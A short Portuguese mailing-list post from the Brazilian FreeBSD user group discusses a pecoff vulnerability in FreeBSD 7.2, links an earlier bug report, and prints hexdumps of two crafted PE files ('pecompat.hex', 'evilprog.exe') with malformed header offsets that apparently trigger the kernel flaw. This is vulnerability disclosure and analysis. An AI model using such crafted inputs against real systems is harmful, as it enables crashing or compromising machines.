[FUG-BR] FreeBSD 7.2 - vulnerabilidade no pecoff

Anderson Eduardo anderson em hacknroll.com
Terça Julho 21 11:57:57 BRT 2009


Então..

Fazendo uma pequena análise parece realmente que é a mesma falha.

http://lists.freebsd.org/pipermail/freebsd-bugs/2005-May/012812.html

c0d3l4bs# hexdump -C pecompat.hex
00000000  4d 5a 78 78 78 78 78 78  78 78 78 78 78 78 78 78  |MZxxxxxxxxxxxxxx|
00000010  78 78 78 78 78 78 78 78  78 78 78 78 78 78 78 78  |xxxxxxxxxxxxxxxx|
*
00000030  78 78 78 78 78 78 78 78  78 78 78 78 9c ff ff ff  |xxxxxxxxxxxx....|
00000040
c0d3l4bs# hexdump -C evilprog.exe
00000000  4d 5a 61 61 61 61 61 61  61 61 61 61 61 61 61 61  |MZaaaaaaaaaaaaaa|
00000010  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61  |aaaaaaaaaaaaaaaa|
*
00000030  61 61 61 61 61 61 61 61  61 61 61 61 ee ee ee ee  |aaaaaaaaaaaa....|
00000040  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61  |aaaaaaaaaaaaaaaa|
*
00000fe0
c0d3l4bs#


Mais detalhes sobre a lista de discussão freebsd